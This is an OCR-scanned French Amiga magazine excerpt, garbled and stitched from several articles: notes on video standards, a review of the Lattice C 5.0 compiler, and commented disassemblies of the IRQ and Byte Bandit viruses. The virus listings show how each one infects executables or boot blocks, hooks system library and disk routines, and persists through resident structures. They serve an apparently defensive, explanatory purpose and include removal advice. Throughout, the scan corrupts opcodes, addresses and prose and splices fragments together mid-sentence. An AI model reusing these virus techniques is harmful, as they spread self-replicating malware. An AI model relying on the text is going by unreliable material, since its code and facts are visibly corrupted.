chaque image) contre un simple compteur pour l’U- MATIC. Ces deux standards utilisent la même cassette dont il existe une version "compacte" pour les magnétoscopes portables qui peut être lue sans adaptation sur les scops de montage.
Les formats "familiaux" étaient, il n’y a pas encore longtemps, tous basés sur une bande d 7 2 pouce. Le BETAMAX, format SONY, le VHS et sa variante compacte pour camescope, le V2OO0 (c’est marrant, tout le monde s’est dépêché d’oublier ce joli standard bien franchouillard). Mais, avec les progrès réalisés en matière d’éléctronique et des systèmes de codages repensés, ces formats "populaires" accèdent désormais à une qualité prfoessionelle. Le format BETAMAX, mort sur le marché familial, trouve une nouvelle jeunesse sous le standard BETACAM : c’est la même cassette mais elle tourne deux
fois plus vite et le codage s’opère en composantes. Idem pour le VHS qui, une fois codé en C - Y (chrominance séparée de la luminance) devient le S- VHS, nouveau standard JVC.
Enfin, un mot sur le format 8mm dévoué à la grande cause du camescope qui sert à filmer mamy au zoo ou archibald, le petit dernier, en train de faire un acrial totally rad’ avec son skateboard contre un mur en béton et l’intervention du SAMU et le visage triste de l’infirmiere-qui-supporte-pas-de- rouler-vite-en-J7-à-l’heure-de-la sortie- des-bureaux ainsi que toutes les merveilles de notre planète.
Et, pour rire, j’ai vu un camescope sud-coréen qui utilisait le standard D-A-T cassette numérique audio. Je n’en ai jamais entendu reparler. S’agissait t-il d’une erreur d’un bureau d’étude shooté à l'alcool de soja et au Codeur Pour obtenir un bon résultat, il faut pouvoir accéder à un vrai codeur RVBS 50Hz en entrée et ce que vous voulez en sortie. Yapa d’secret.
Néanmoins, en enregistrement PAL direct, n’oubliez pas cette nécessité qu’est le bouclage 75 Ohms. Il faut, de façon impérative, que. La demicre sortie du dernier appareil soit "fermée" par une résistance de 75 Ohms. On trouve dans les magasins spécialisés des "bouchons" tous prêts en prise BNC.
Poète numérique Voilà, j’espère avoir éclairé d’un jour nouveau votre lanterne magique et que, dorénavant, votre créativité débridée de poète numérique ne se heurtera plus à la paroi froide et abrupte de la terminologie vidéo.
J’arrête parce que, moi, tous ces chiffres, ces sigles, ces problèmes, ça me fout un mal de tronche pas possible.
EL YETi est un vrai génie des alpages I ?
Carnet publicitaire américaine pour Vamiga 500
- TYPE : composite donc modulé dans un standard composantes RVBS
ou C - Y
- FORMATS: BVU3 4 U-MATIC 314 S-VHS1 2 BETACAM1 2 VUS et VHS-C112
BETAMAX1 2 V2OO0 1 2 vidéo 8 8mm Il est important de piger que
ces notions sont toutes indépendantes; un format ne conditionne
pas un standard.
Dans le courrier que je reçois, la bourde la plus répandue consiste à mélanger le signal et le support. Par exemple, il existe des magnétoscopes U-MATIC dans les trois standards dont j’ai parlé plus haut mais on ne rentre que des signaux composites.
Je reçois également des lettres de gens consternés par les enregistrements vidéo qu’ils font de leur ’miga. Je reprécise quelques points.
- L’image de ’miga à laquelle vous êtes habitués est un très beau
RVB.
Vous n’arriverez jamais à avoir des couleurs aussi "petantes" en composite.
- Les images auxquelles vous habitue crabe séché ???
Voila, petite récapitulation :
- STANDARDS: NTSC fréquence trame 60Hz, 525 lignes PAL fréquence
trame 50Hz, 625 lignes SECAM ” ” ” ” votre magnétoscope ne
subissent pas de transcodage (je pense ici de PAL vers SECAM)
- Les petits modulateurs, intégré sur ÎOOO ou en option sur 500
et 2000, ne peuvent en aucune façon etre assimilés à des
codeurs PAL. Le signal composite qu’ils fournissent n’est des
tiné qu’à une visualisation directe sur écran. Un bon codeur
vaut entre 5 et ÎOOOO Frs HT (je vais bientôt tester un codeur
de provenance teutonnique et d’un prix plus abordable (entre 2
et 3000 Frs)).
FH Dans cas conditions, vous comprendrez que ma première occupation a été la survie.
Le compilateur est livré sur 6 disquettes avec un script d’installation pour les possesseurs de disque dur. Pour les autres un conseil, achetez une extension mémoire cl (ou) un deuxième lecteur.
L'installation du compilateur sur une disquette est presque impossible à moins de se passer de l’éditeur ou du deboggeur, or ce sont ces deux programmes qui font le principal intérêt de la version 5.0. Il faut donc soit les avoir en Ram (nécessité de 1 méga) soit avoir un deuxième lecteur, (nota si on a les 2 ce n’en est que mieux car pour compiler sous éditeur (qui fait une centaine de K) il reste peu de place) Le manuel se présente sous la forme de deux classeurs (tient ils copient MANX?) Que le YETI devrait trouver très jolis, n’est ce pas mon cher collègue?
YETI: ... (réflcction intense)... Graooork, wouglaah!
(traduction: Oui le package est très classieux et la couverture des classeurs est moins rugueuse que celle de l'AZ- TEC et préserve mieux la douceur de mes mains!)
D comporte 6 parties: le manuel de l’utilisateur, l’éditeur, les commandes, les librairies, les utilitaires et le debugger.
Le manuel de l’utilisateur On remarquera une partie réservée au macro assembleur plus importante que d’habitude (elle était quasiment inexistante dans les doc précédentes) sinon rien de nouveau dans cette partie.
L’éditeur LSE (lattice screen editor) Tout d’abord une constatation : il faut éviter d’utiliser le pavé numérique qui sert de commande. La touche F.mer par ex permet de basculer en inlerlace. Très pratique en clavier US, mais en AZERTY il faut shifter pour accéder aux chiffres (gare & la crise de nerfs surtout que le . Correspond au Del, les fonctions sont en fait celles qui sont marquées sur le champ des touches du pavé. Attention.
0 supprime le mode insertion). FI donne accès au menu Help ouf !!! Une page et demie d'options - de quoi perdre la boule; heureusement qu'ils ont pense au help.
Bien sûr il y a aussi des menus déroulants regroupant une bonne partie des options. Comme dans un éditeur digne de cc nom il est possible de déplacer le curseur avec la souris, De plus si votre ligne est trop longue au lieu de déplacer tout le texte vers la gauche (ce qui fait que vous ne voyez plus ce qu’il y a dessus et dessous) il décale uniquement la ligne et signale une ligne plus longue que la normale par un en vidéo inverse.
De plus il fait automatiquement l’indenta- tion pour le C (chaque fois que l’on tape une ). Vous aurez la possibilité d'éditer jusqu'à 9 lïcbieis en même temps.
Le point le plus noir: pas d’option "save as" ni de requester pour choisir le nom du fichier grrrr!!!!!
Enfin le plus intéressant : la possibilité d’appeler le compilateur depuis l'éditeur.
Tout d'abord Ctrl F4 pour choisir les options de compilation puis F4 et en avant!
Chaque fois qu’ il y a une erreur arrêt avec choix: continue abandon ignore et le curseur se positionne sur la ligne où a été détectée l'erreur (ou sur la suivante s’il s’agit d’un ; manquant) De plus les messages d’erreurs sont dans un fichier éditable ce qui permet de les traduire (il existe d'ailleurs une version en allemand, merci pour nous pauvres petits français!).
YETI : Je m'en fous, en brilish ou en teuton, j'y pige que daüe. Le papier du manuel a bon goût.
Les commandes Liste des commandes et de leurs options : voir les parties utilities et debugger pour plus de détails. A noter que cette partie fait double emploie sauf pour le compilateur, c'est à dire le Ici et lc2.
Remarquons l'existence d'un lclb qui est un big compilcur, avec quelques options en plus, et 20 K de code supplémentaires, délicate attention pour les possesseurs de seulement 512 K que d'avoir conçu deux versions. Côté compilateur, plein de nouvelles options et en particulier la possibilité d'utiliser un debogger (epr pour les intimes). A noter qu’il n'est plus nécessaire de déclarer les fonctions en void ce qui provoquait l’apparition de waming dans les versions précédentes.
De plus l’oubli d’un ; est signalé mais n'est pas considéré comme une erreur entraînant un crash. Attention tout de même, le compilateur peut sc tromper sur les intentions du programmeur. En cas d'oubli il vaut donc mieux arrêter et rajouter le ; manquant.
LATTICE C 5.02 premier épisode ÜOOOO Uran. W l«. -m ,¦* «. LATTICB 5.0! «-«do* a ELYBIi m I. ada.)
Les libraries: Manuel très complet de toutes les fonctions proposées par le compilateur avec de nouvelles fonctions qui ont été ajoutées par rapport aux anciennes versions.
Les utilitaires Quelques-uns au passage : WC word count qui permet de compter le nombre de mots et de lignes dans un fichier.
ÇXREF générateur de référence croisées pour le C. DIFF comparateur de fichier.
FILE qui cherche des fichiers sur disque.
GREP un utilitaire à la sauce UNIX.
LPROF et LSTAT qui permettent de tester les performances des programmes et donc d'optimiser chaque partie en conséquence, iprof permet de savoir dans quelle partie un programme passe le plus de temps alors que lstat sort les résultat sous forme de poucentages (C presque la même chose).
TB trace back qui permet de récupérer dans un fichier les registres, le n' du guru l'adresse du crash en hexa et par rapport à un label (ex: main + 5) la pile etc... Imk équivalent du make de l'Aztec (il était temps) très complet.
En ce qui concerne le déoggeur, je n'ai pas eu le temps matériel nécessaire à un test sérieux. H semble qu’il s'inspire très fortement de SDB (celui du MANX) et un peu de Métascope. Quoiqu’il en soit, c'est une chouette amélioration qui devrait faciliter les phases de mise au point. Le vous en reparle dès que je l'aurai poussé à bouL Ben voilà, f espère avoir éclairé un peu votre lanterne. A bientôt pour la suite de ce test long et périlleux où l’homme se rapproche de ses racines et où on peut se dire que la souffrance physique est sans limites.
Romeo Rapido Dans le cadre de la campagne menée par Anews pour l’information et la démystification de certaines rumeurs concernant les virus (Ed.-ah bon?), voici le désassemblage du dernier en date: l’IRQ (merci à Romeo Rapido pour m'en avoir fourni un exemplaire).
DESASSEMBLAGE DU VIRUS IRQ IM„usr Toul a été dit ou presque sur le sujet, aussi scrai-jc bref. Ce virus n'est pas méchant en soi (il se contente de modifier le titre de la fenêtre CL1 courante en y mettant le message décrit en fin de listing) mais il représente une • étape dans l’évolution des virus en ce sens qu’il est le premier à pouvoir s’infiltrer dans les disques durs.
Etant donné qu’il se greffe sur les exécutables de moins de 100 000 octets, je me suis contenté de désassembler le hunk propre du virus, que j'ai dû auparavant décoder avec la routine qu'il utilise lui- même (inutile donc de rechercher la chaîne mentionnée plus haut dans vos fichiers suspects, ainsi que le faisait remarquer Ed dans le n' 12).
Voici les remèdes:
- Prévention: le petit truc publié dans A-News n* 12 me paraît
aussi simple qu’efficace: il consiste à faire croire au virus
qu’il est déjà installé
- Elimination: utiliser VirusX 3.10 en tâche de fond. Pour une
expédition punitive, XV semble préférable car il est capable de
sonder un directory entier et de rétablir les fichiers
infectés.
Cla988: movem.l A6-AQ D7-D0,-(A7) Cla98e: bsr.l Se laata; Routine de décodage c!a990: move.l SOOOJ.A6 cla99d: Ica 966(PCX=Sclad5c),A0; incrémente le compteur cla998: addq.l 1,(A0); de reproduction cla99a: Ica 176(PCX=$ claa4c),A0 cla99c: move.l (A0),D0; Modifie la valeur utilisée cla9a0: add.l SdITCOd.DO; par le codage (voir plus bas) Cla9a6: move.1 D0,(A0) Cla9a8: bsr.l Sclaaffl: Début du virus cla9ac: bra.1 Sclaad0;fin claa40: movctn.l (A7H.A6- A0 D7-D0: Saute vers la routine originale claa44: jmp $ cladb8 claa4a: raovc.I Sc3f9dc3b,D0; Celle valeur peut changer cloaSO: Ica
-194(I'CX-4cla990).A0 ; (voir plus haut) claaS4: move.w $ 0025J71 claa58: cor.I D0,(A0)r elaaSa: addq.l 3J» claaSc: dbf Dl,Selaa58 c Jaa60: rts claa62: cmpi.w $ 0Of0,-406(A6); Adresse de OldOpenUbrary en rom?
Claa68: bpl.s Sclaaéc; oui: on s'installe claaéa: ris ; non, c'est déjà fait claabc: move.l S0000042c,DO; Réserve une zone claa72: moveq »$ 00,D1; de 1060 4 8 octets claa74: jet -198(A6) claa78: îea 814(PCK=Sclada8),Al ; Sauvegarde son adresse claa7c: addq.l 88,DO; Saute les 8 premiers octets claa7e: move.l D0,(AI) claa80 move.l D0,Al claa82: move.w S0423,DO claa86: Ica -256 PCX=Scla988),AO Claa8a: move.b (A0H.(A1)+ claa8c: dbf DO.SclaaSa; Relcigemcnt vers celle adresse Claa90: move.l 790(PCX=$ clada8).Al claa94: Ica 958(A1).AI ; Sclad46 = claa98: movc.l AIJ». Adresse du nouveau OldOpenUibrary
ctaa9a: movc.l SffrTTc68.A0-. Son offSct dans Exec (-198) claaaO: movc.l A6.A 1 claaa2; jsr -420(A6); SctFunetionO cloaaô: Ica 688(PCK-$ clad58).A0 claaaa: move.l DO,(A0); Stocke l’ancienne valeur claaac: movc.l 762(PCX=$ clada8),Al claabO: Iea I014 A1),A0 claab4: Ica 940fAl),AI claabS: movcJ AI,(A0) claaba: movc.l 748(PCX-$ clada8). A0 ; Se crée une entrée claabc: Ica 984(AO),AO; parmi les Résidents claac2: move.l A0,550(A6); pour ne pas être effacé: claac6: Iea 8 A0),Al; Pointeur sur cllc-tncnic claaca: move.l A1 ,(A0) claacc: move.l A1,10(AO) claadO: Iea 30 A1),A1; OffsetdclsrouLine claadé:
move.l A1,14(A0); d'initialisation claadd: jsr -612(A6) claadc: move.l DO,554(Aé); Valide chccksum claaeO: rts claae2: bist 0,Sdff005; Voici le virus claaea: beqs JclabOS claaec: lea -290(PCX=Scla9cc)1Al ; ’intuilion.library’ claafü: move.l 614(PCX=Sclad58),AO claaf4: jsr (A0); Exécute l'ancien OMOpcnLibrary claafb: tst.l DO; Bien exécuté?
ClaafS: heq.s SclaaeO; Non, fut , claafa: move.l D0.A6; IntuitionBase claafe: move.l J2(A0),A0; Fenêtre courante clabOO: lea -272(PCX=$ cU9£2),Al ; Adresse du titre clab04: jsr -276(A6); SetWindowTitlesO clab08: move.l J0004.A6 clabOc: Ica -35C PCX=$ cla9bO),A3 clabIO: move.l «0001 «AaO.DO clablfi: moveq $ 00,D1 clab!8: jsr -198(A6); AllocMem(100000 octets) clablc; movc.1 D0.A4; A4 - Zone mémoire clablc: tsü D0 clab20: beq.s SclaaeO: Pas de mémoire: fin clab22: Ica -336(PCX=Scla9cO),Al clab26: move.l 560(PCX=Sclad58),A0 clab2a: jsr (AO); Ouvre 'd06.library' clab2c: tst.1 DO; froblème: clab2e:
beq.l $ c!ad26; libérer la mémoireetbye!
Clab32: move.l D0,A6; A6 - DosBase clab34: btst 2,$ dfTO06 clab3c: bne.s Sclabb2 clab3e: lea -354(PCX=Scla9de),A0 clab42: move.l A0P1 Clab44: move.l $ 000003ed,D2 clab4a: jsr -30(A6); Openfstanup-sequenee) Clab4e: move.l DO,AS; A5 - filehindle clabSO: move.l D0.D1; D1 - filehandle clab52: beq.s Sclabb2; Pas pu l'ouvrir... c1ab54: movc.l S000186a0,D3 ; Longueur maximale clab5a: movc.1 A4.D2 clab5c:jsr -42(A6); Read(startup-sequence) clabOO: Ica 548(PCX=ScIad86),Al ; Al -Buffer pour 1ère commande clab64: movc.l A4.A0; A4 contient le fichier clab66: bra.s SclabOe clab68: cmpi.b $ 0a,(A0)+ ;
Va au lcr LineFccd clabôc: bne.s Sclab68 clabôc: cmpi.b *S3b,(A0);Saute';' clab72; bcq,s 5clab68 clab74: cmpi.b $ Oa,(AO); Saule LincFccds clab78: bcq.s Sclab68 clab7a: cmpi.b *$ 22,(AO); Saute clab7c: bcq.s $ c1ab68 clab80: cmpi.b *$ 20,(AO) ; Si différa» d'espace clab84: bne.s $ clab8a; stocke le nom trouvé clab86: addq.l I,A0 clab88: bra.s Sclabôe; Sinon, continue la recherche Clab8a: move.b (A0)t,(Al)t clabüc: cmpi.b S3b,(A0); Stocke tant que le caractère c!ab90: beq.s Sclaba4; est différent de Lfet Clab92: cmpi.b *$ 20,(A0) clab96: beq.s $ claba4 clab98: cmpi.b *$ 22,(A0) clab9c: beq.s $ elaba4
clab9c; cmpi.b S0a,(A0) claba2: bne.s $ clab8a claba4: move.b S00,(A1); Un NULLpour termina c1aba8: lea 476(PCX=$ cUd86),A3 clabac: movc.l A5.D1 clabae: jsr -36(A6): Famé le sta-tup clabb2: move.l A3J71 ¦ clabb4: move.1 *$ 000003ed,D2; Mode'ancien'(lecture) c 1 abbe: jsr -30(A6)J Ouvre le nom stocké clabbe: tsU D0 clabtX); bne.s SclabdO; Ca a marché clabc2: subq.l *2.A3; Echoué: réessaie en mettant clabc4: movc.l A3.D1; le préfixe'c:'devant elabeé: jsr -30(A6) elabea: tsLl D0 clabcc: bcq.l Sclad le; Toujours pas: on sort clabdO: movc.1 D0.A5; A5 - filehandle clabd2: movc.1 D0.D1; Dl -
filehandle clabd4: movc.l A4.D2; A4 -buffer d'entrée clabdé: movc.l *$ 000186aO,D3 ; D3 - Longueur maximale clabdc: jsr -42 A6); (100 000 octets) clabefl: movc.l D0,D7; Cclk ci cst-cllcplus grande clabe2: cmpi.l *$ 000186o0,D0; que la longueur lue?
C labe8: beq.l $ c lad 10; Oui: trop gros poisson, bye!
Clabcc: movc.l A5.D1 ; Non: on a répété la future victime elabee: jsr -36 A6); On la referme... clabf2: cmpi.l *$ 0CC003f3,(A4); HUNKJIEADER?
C lob 18: bnc.l $ cladlc; Non, on abandonne clabfc: move.l 8(A4),D6; Va chercher dans le hunk approprié clacCO: lsl.1 2306; l'identificateur du virus clac02: cmpi.l *$ fffe6100,30(A4,D6.L) clacOa: beq.l Scladlc ; Déjà infecté clacOe: move.l A3,DI elacltt moveq $ CO,D2 clacl2: jsr -186(A6); SetProtection(rwed) clacI6: move.1 A3.D1 claclb: move.1 *S000003ee,D2 clacle: jsr -30fA6 , Ouvre la commande, mais clac22: move.l DO,A5; en écriture, cette fois!
Clac24: beq.l Scladlc clac28: lea -484(PCX=$ claa46),A0 clac2c: move.l (A0).A2; A2 - routine originale clac2e: clr.l (AO) clac30: addq.l 1,8(A4); Incrémeme nombre de hunks clac34: addq.l 1,!6(A4); Incrémente la taille clac38: move.l A5.DI clac3a: movc.l A4.D2 clac.3c: moveq 8S14.D3 clac3e: jsr -48(A6) ; Ecrit ces octas d'identification clac42: lea -648(PCX=$ cU9bc).A0 clac46: move.l A5.D1; Maintenaj». écrit la taille clac48: movc.l A0J72; du nouveau hunk ($ 109) clac4a: moveq $ 04J 3 clac4c: jsr -48(A6);----------- clacSO: movc.l A5J71; Puis les hunks d'idemincadon clacS2: Ica 20(A4) .0
clac56: move.1 A0.D2; de la commande d’origine clac58: move.1 D6.D3 clacSa: lea 20(A4,D3.L),A3 clac5e: sub.l D3.D7 clac60: subi.l $ 00000014,D7 clac66: jsr -48(A6);-------------- elaeôa: move.l A5,D1; Maintenant, au tour du 1er hunk clacôc: lea -694(PCX=$ cla9b8),A0 clac70: move.1 A0.D2; Ecrit HUNK_HEADER ($ 3e9) clac72: moveq $ 08,D3; Puis la taille ($ 109) clac74: jsr -48(A6) ;-------------------- clac78: bsr.l $ claa4a; Recode toute celte partie clac7c: move.l A5.D1; avant de la récrire clac7e: lea -760(PCX=$ cla988),A0 clac82: move.1 A0.D2 clac84: move.1 $ 00000424,D3; 1060 octets clac8a: jsr
-48(A6);--------------- clac8e: move.l A5.D 1 ; Ecrit HUNK_RELOC clac90: lea -618(PCX=$ claa28),A0 clac94: move.1 A0.D2; suivi de la table derclocation clac96: moveq $ 18,D3 clac98: jsr -48(A6) ;--------------- clac9c: bsr.l $ claa4a ; Re-décodc la routine clacaO: moveq $ 00,DO claca2: move.l A3.A0; AO = A3 = buffer claca4: addq.l 4,D0; DO - Longueur déjà analysée clacaô: move.l (A0)+,D1 claca8: cmpi.l $ 000003cb,Dl; HUNK_BSS?
Clacae: bne.s $ clacb6 clacbO: addq.l 4,D0; Reconnu: incrémcntedO clacb2: movc.1 (A0)+,D 1 ; Passe au suivant clacb4: bra.s $ clad00 clacbô: cmpi.l $ 000003ec,Dl; HUNK_REI.OC32?
Elaebe: bne.s $ clacd2 elaebe: addq.l 4,DO; Reconnu: incrémentedO claccO: move.l (A0)+JD1; Nombre d'offsets nul?
Clacc2: beq.s $ clad00 ; Oui, fin de traitement clacc4: addq.l 4,DO ; Incrémcnte taille analysée clacc6: addq.l 1,(A0 +; Incrémente numéro de hunk clacc8: lsl.l 2,D1 ; Pour convertir long en byte clacca: lea 0(A0,D1.L),A0; Va chercher le suivant clacce: add.l Dl.DO; et incrémente la mille analysée clacdO: bra.s $ clacbe clacd2: cmpi.l $ 000003fl,Dl; HUNK_DEBUG?
Clacd8: beq.s $ clacca elaeda: cmpi.l $ 000003e7,Dl; HUNK_UNIT?
ClaceO: bh.s $ clacf8 clace2: cmpi.l $ 000003ea,Dl; HUNK_DATA?
Clace8: bgt.s $ clacf8 clacea: addq.l 4,D0 clacec: move.l (A0)+,Dl; Taille de ces data clacee: lsl.l 2J31; convertie en octets clacfO: lea 0(A0 j)l.L),A0; Déplacement pour se clacf4: add.l D1.D0; placer à U fin clacfé: bra.s $ clad00; et boucler clacfB: cmpi.l $ 000003£2,Dl; HUNK_END?
Elaefe: bne.s $ clad06 cladOO: cmp.l D0.D7; Tout y est passé?
Clad02: bne.l $ claca4; Non: on boucle clad06: move.l A5.D1 clad08: move.l A3,D2 cladOa: move.1 D7.D3 cladOc: jsr -48(A6); Oui: on récrit tout cladlO: move.l A5,D1 cladl2: jsr -36(A6); Fermeture cladlé: lea -722(PCX=$ claa46),A0 cladla: move.1 A2,(A0); A2 pointe sur la routine cladlc: move.1 A6.A1; originale cladle: movc.l $ 0004,A6 clad22: jsr -414 A6); Ferme la bibliothèque clad26: move.l A4,Al clad28: move.l $ O0O186aO,DO clad2e: jsr -210(A6); Libère la mémoire clad32: rts clad34: movcm.1 A6-A0 D7-D0,-(A7); Appelé lors de clad38: move.l $ 0004,A6; l'initialisation de la clad3c: bsr.l $ claa62;
table résidente: clad40: movem.1 (A7)+,A6-A0 D7-D0; installation du virus clad44: rts clad46: move.l 16(PCX=$ clad58),-(A7) ; Appelé à chaque clad4a: movem.1 A6-A0 D7-D0,-(A7); utilisation de clad4e: bsr.l $ claae2; OldOpenLibrary clad52: movcm.1 (A7)+,A6-A0 D7-D0 clad56: rts cla9b0: dc.b ’x dir'.O.O cla9b8: dc.l $ 000003e9,$ 00000109; MUNK_CODE suivi de taille cla9c0: dc.b ’dos.library'.O cla9cc: dc.b 'intuition.library’,0 cla9de: dc.b ':s startup-sequence,0 cla9f2: dc.b ' AmigaDœ présents: a new virus by the IRQ-TeamV41.0',0,0 claa26: dc.w $ ffff claa28: dc.l $ 3cc; HUNKJLELOC32 claa2c: dc.l $ 1;
Un seul offset claa30: dc.l $ 1; Dans le 1er hunk claa34: dc.l $ bc; A l'offset $ be (cf. $ claa46: jmp) claa38: dc.l $ 0; Fin de cette section claa3c: dc.l S3f2; HUNK_END clad58: dc.l $ fcl430; Ici sera stockée le vrai OldOpenLibrary clad5c: dc.l $ b; Compteur (incrémcnlé) cl ad 60: dc.l $ c071c0; Adresse de la structure résidente clad64: dc.l $ 0 clad68: dc.w $ 4afc; Début de la structure résiderte clad6a: dc.w $ c071c0; Pointeur sur la structure elle-même cladôe: dc.l $ c071de; Pointeur sur la fin de la structure clad72: dc.b $ 1; Flag (exécuter la routine d’initialisation) clad73: dc.b $ 21; Version
clad74: dc.b $ 3; Tvpe (device) clad75: dc.b $ cc; Priorité (206) clad76: dc.l $ 0; Pas de nom clad7a: dc.l $ 0; Pas de commentaires clad7c: dc.l $ c0718c; Routine à appeler pour initialiscr cl ad 82: dc.w $ 0 clad84: dc.b ’c:toto’; Ici sera stocké le nom de la première commande ; du startup-sequencc. Petite remarque: teto est un nom ; qui sonne plutôt français, vous ne trouvez pas? Bizarre... clad8a: dc.w $ 0 clad8c: blk.b 28,0; Réserve de la place pour 30 caractères clada8: dc.l $ c06de0; Pour stocker la zone de mémoire d'AllocMem Je voudrais terminer en lançant un appel aux futurs créateurs de
virus. Il semble que tout ait été dit sur le sujet, et il n’existe probablement plus beaucoup d’utilisateurs qui ne protègent pas systématiquement toutes leurs disquettes par acquit de conscience. Alors, réfléchissez à deux fois avant de vous lancer dans l’écriture d’un nouveau virus révolutionnaire: vous avez sûrement mieux à faire.
DESASSEMBLAGE DU VIRUS BYTE BANDIT ERIC CHAUVEL3-1989 ABREVIATIONS UTILISEES- PTR. Pointeur PROG. Programme STRUC. Structure INTER. Interruption NB. Nombre a000 444F5300 41D25F05 00000370 ’DOS'.chccksum,bloc racine C300C 6000 003E bra S0O0C304C C3010 56697275 73206279 20427974 65202020 'Virus by Byte ¦ C3020 42616E64 69742069 6E202039 2K38372E 'Bandit in 9.87 ' C3030 4E7S6D62 6S72206F 6620202020202020 'Nutnberof C3040 636F7079 73203A0O 00000000 'copys : ' C304C 48E7 7F7F movem.l D1-D7 A1-A7,-(A7) C3050 2C78 OOOt move.l $ 0004,A6 ;EXECBASE 4000 °°DFP09A movc-w 54000,SO0DFF09A ;INTENA (INTERDIT
INTER.)
C305C 062E 0001 0126 addi.b $ 0I,$ 0126(A6) ;Œ)NESTCNT VERIFIE IA PRESENCE DU VIRUS DANS LA MEMOIRE DE L’AMIGA EN VALEUR DU PTR. SUR LE PRG. D'INTER. RASTER r-,rJ!yj£?£ltPTION lJBf:8EEAU PASSAGE A LA UGNE RASTER 0) 222 tnove.w $ 0O94(A6),DO ;RASTER. INTVECSI51 C3066 C0BC OOOOCOK) and.l $ OOOOOOFO,D0 C306C B07C OOFO cmp.w $ OOFO,DO C3070 6600 0040 bne SOOOC30B2 ;SAUT SI LE VIRUS EST PRESENT ;TRANSFERE DE TOUT LE PRG.
0074 41EE0142 0078 2050 C307A 2268 0018 C307E 2A49 0080 41FAFF7E 0084 45FA 0348 0088 12D8 C308A B5C8 C308C 66FA lea $ 0142(A6),A0 ;PTR. SUR STRUC. MEMLIST move.l (A0),A0 .STRUC MEMLIST move.1 $ OOI«(AO)A1 ;PTR. SUR MEMOIRE RESERVEE move.l Al,AS lea $ 0OOC30OO(pc),AO ;ADRESSE DEBUT PROG.
Ica $ 00003CE(pc),A2 -.ADRESSE FIN PROG.
Movc.b (A0)+,(A1 + cmpa.l A0.A2 bne.s S000C3088 ;SAUT DANS LE PROG. QUI VIENT D’ETRE TRANSFERE.
O08E 41FAFF70 0092 2008 0094 41FA 000A 0098 2208 009A 9280 O09C DBC1 O09E 4ED5 Ica ÏOOOOOOO(pc),AO move.l AO.DO lea JOOOOOAO(pc),AO move.l A0.D1 sub.l D0.D1 adda.1 D1.A5 jnp (A5) ;SAUT DANS PROG.
;ET ON CONTINU ICI DANS LE PROG. TRANSFERE.
OOAO 41FA032C O0A4 4280 O0A6 20C0 O0A8 20C0 O0AA6100 003E OOAE 6100 OOAC ;FIN DE PROG.
C30B2 43FA 030D O0B6 4EAE FFAO OOBA 4A80 OOBC 6700 0024 OOCO 2040 C30C2 2068 0016 lea $ OOOC33CE(pc),AO clr.l DO raove.1 DO.(AO)* move.1 DO,(AO)+ bsr 5000C30EA bsr 5000C3I5C lea S00003Cl(pc),A 1 ;PTR TEXTE'DOS,UBRAJRY' jsr $ FFA0(A6) ;-96 (FINDRESIDENT) tst.1 DO beq SOOOOOE2 move.1 DO.AO
- ......- move.1 $ 0O16(AO),A0 C30C6 042E 00010126 subi.b
$ 01,$ 0126(A6) IDNESTCNT C30CC 6C08 bge.s 5000C30D6 C302ril3rC
0000 0ODFF09A raove.w SCOOO,SOODFFÜ9A ;INTENA (AUTORISE
InltR.)
C30D6 203C 00000000 move.l 500000000,DO C30DC 4CDF FEFE movem.l (A7)+J31-D7 A1-A7 C30E0 4E75 rts C30E2 203C FFFFFFFF movc.l «FFFFFFFF DO C30E8 60P2 bra. S SOOOC30DC ¦.CREATION D’UN BUFFER DE 1024 OCTETS
- OEA FC 4000 0ODFF09A move.w $ 4000,$ OODFF09A ;INTENA (INTERDIT
C30F2 062E 0001 0126 »ddi.b $ 01,S0126(A6) .IDNESTCNT C30F8
48E7 COFE movem.l D0-D1 A0-A6.-(A7) C30FC203C 00000400 move.l
«00000400,DO ;1024 OCTETS C3102 223C 00000002 move.1
«00000002J31 ;CH1P-MEM0RY C3108 4EAEFF3A jsr $ FF3A(A6) ;-198
(ALLOCMEM) C310C 41FA 02D0 lea S000C!3DE(pc),A0 C31102080
movc.1 D0,(A0) ADRESSE DES 1024 OCICTS-XAO) CHERCHER PTR. SUR
NOEUD TRACKDISKDEVICE C3112 41EE 015E ' ’ --- Ica $ OI5E(A6),AO
JTR. SUR DEYICEXIST Ica $ OOOC33BO(pc), A1 ;PTR.TEXTE’TRACK- jsr
SFEEC(A6) ,-276 (FINDNAME) ist.1 DO C3116 43FA 0298 DISKDEVICE'
C311A4EAE FEEC C311E4A80 ;D0 CONTIENT UN PTR. SUR IE NOEUD
TRACKDISKDEVICE DE LA DEVICEUST C3120 6790 beq.s SOOOC30B2 ;SI
PAS DE NOEUD ALORS FIN C3122 2040 move.l DO,AO ;PTR. SUR IA
TABLE DE SA UT DE TRACKD!SKJ)EVTVE C3124 49E8 FFE4 lea
$ FFE4(A0) A 1-28 (ADRESSE BEGIN_IO) .SAUVEGARDE ANCIEN PTR.
SUR BEGINGJO C3128 4BFA02AC lea $ OOOC33D6(pc),A5 C312C2A94
move.l (A4).(A5) ;ET MISE EN PLACE DU NOUVEAU PTR.(DETOURNEMENT
DU PROG. ORIGINAL POUR ALLER EXECUTER LA PARTIE DE PROG.
EN SC3IBS(PC) ) C312E41FAC088 lea SOOOC3IB8(pc .AO C3132 2888 movc.l A0,(A4) ;SA UVEGARDE PTR. SUR LE PROG. D‘INTER. A EXECUTER LORS D’UNF. INTER. RASTER C3134 202E 0094 move.l S0O94(A6).D0 C3138 41FAO2A0 lea $ OOOC33DA(pc),AO C313C 2080 movc.l DO,(AO) ;ET MISE F.N PLACE DU NOUVEAU PTR.(DETOURNEMENT DU PROG. ORIGINAL POUR ALLER EXECUTER IA PARTIE DE PROG.
EN SC32CA(PC) ) C313E 41FA018A lea $ OOOC32CA(pc),AO C3142 2D48 0094 movc.1 AO,$ 0094(A6) 0146 042E 0001 0126 subi.b «01,$ 0126(A6) : IDNESTCNT O14C6C08 bge.s $ 0000156 014E 33FC COOO O0DFFO9A move.w »$ COOO,$ OODFT09A :1NTENA (AUTORISE INTER.)
0156 4CDF 7F03 movem.l (A7)+,DO-D1 AO-A6 015A 4E75 rts ;INITIAUSA 77ON D’UNE STRUC. RESIDENTE QUI PERMET L'EXECUTION D’UN PROG. LORS,D’UN RESET.
.TABLEAU DE PTR. SUR STRUC. RESIDENTE.
015C 41FA0284 lea S000O3E2(pc).A0 0160 43E8 0008 lea $ 0OO8(A0)Al ;PTR- SUR STRUC.
RESIDENTE ;ADRESSE STRUC. RESIDENTE DANS TABLEAU DE PTR.
0164 2089 move.l A1,(A0) ;MARQUE DE FIN DU TABLEAU DE PTR.
